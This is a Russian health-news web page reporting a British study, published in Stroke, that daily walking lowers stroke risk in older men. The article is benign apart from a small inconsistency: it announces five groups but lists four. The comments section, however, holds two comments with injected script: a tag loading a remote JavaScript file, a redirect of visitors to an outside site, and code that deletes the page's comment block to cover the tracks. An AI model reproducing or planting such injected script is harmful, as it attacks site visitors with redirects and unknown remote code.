Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Обычные прогулки избавят ...  >>  Обычные прогулки избавят вас от инсульта! Сколько гулять?
 
Обратная связь
 

Обычные прогулки избавят вас от инсульта! Сколько гулять?

Размер шрифта
02 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Великобритании сообщают: ежедневные прогулки, притом отнюдь не самые интенсивные, могут значительно снизить риск инсульта у пожилых людей.

Обычные прогулки избавят вас от инсульта! Сколько гулять?

Результаты нового английского исследования свидетельствуют о том, что прогулки в течение часа или двух снижают риск инсульта как минимум на треть, а гуляя каждый день по три часа можно увеличить этот показатель еще больше – до двух третей!

«Инсульт является одной из самых главных причин смерти и инвалидности, поэтому разработка профилактических мероприятий в этой сфере является важнейшей задачей, особенно в отношении пожилых людей, находящихся в группе высокого риска», – рассказывает доктор Барбара Джефферис, глава исследования, научный сотрудник отделения общественного здоровья Лондонского университетского колледжа (Великобритания).

«Необходимо выработать у себя привычку гулять каждый день как минимум в течение часа – это позволяет значительно снизить риск инсульта. При этом абсолютно неважно, куда и зачем вы идете: по делам ли, за покупками или просто удовольствия ради – вы боретесь с инсультом в любом случае».

Более того: по всей видимости, скорость ходьбы не оказывает существенного влияния на прогноз. «Достаточно просто идти, ритм же абсолютно вторичен», – горит Джефферис.

Впрочем, ученые подчеркивают, что обнаруженная закономерность пока не объяснена с точки зрения причинно-следственных связей.

Само исследование выглядело следующим образом. Джефферис и ее коллеги собирали информацию относительно трех с половиной тысяч здоровых мужчин 60-80 лет. Им предложили заполнить анкету, в которой среди прочего присутствовали вопросы и регулярности прогулок.

Далее ученые разделили испытуемых на пять групп: соответственно, те, кто гулял от нуля до трех часов в неделю, от четырех до семи, от восьми до четырнадцати и, наконец, от пятнадцати до двадцати двух часов.

В течение последующих десяти лет ученые авторы оценивали вероятность развития инсульта. Оказалось, что у мужчин из третьей группы риск инсульта снижался на треть в сравнении с теми, кто пренебрегал ежедневным моционом.

Работа английских исследователей была с одобрением встречена и за океаном.

«Мы получили лишнее подтверждение тому, что физическая активность любого рода, включая ходьбу, самым положительным образом влияет на вероятность развития инсульта», – уверен доктор Ральф Сакко, глава отделения неврология клиники университета Майями (штат Флорида, США).

Поэтому гуляйте, как можно больше и чаще! Особенно со своими пожилыми родителями!

Результаты исследования были опубликованы в научном издании Stroke («Инсульт»).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Проверьте прогноз погоды! От этого зависит, будет у вас инсульт или нет!   В какой день нельзя идти в больницу!   Консервированные фрукты приближают вашу смерть! Страшно?   Горький шоколад полезен для сердца! Но все благодаря бактериям!  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 11 июля 2013Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше!
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Зачем спать 10 затем
Что заставит вас храпеть
Чем полезен секс?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.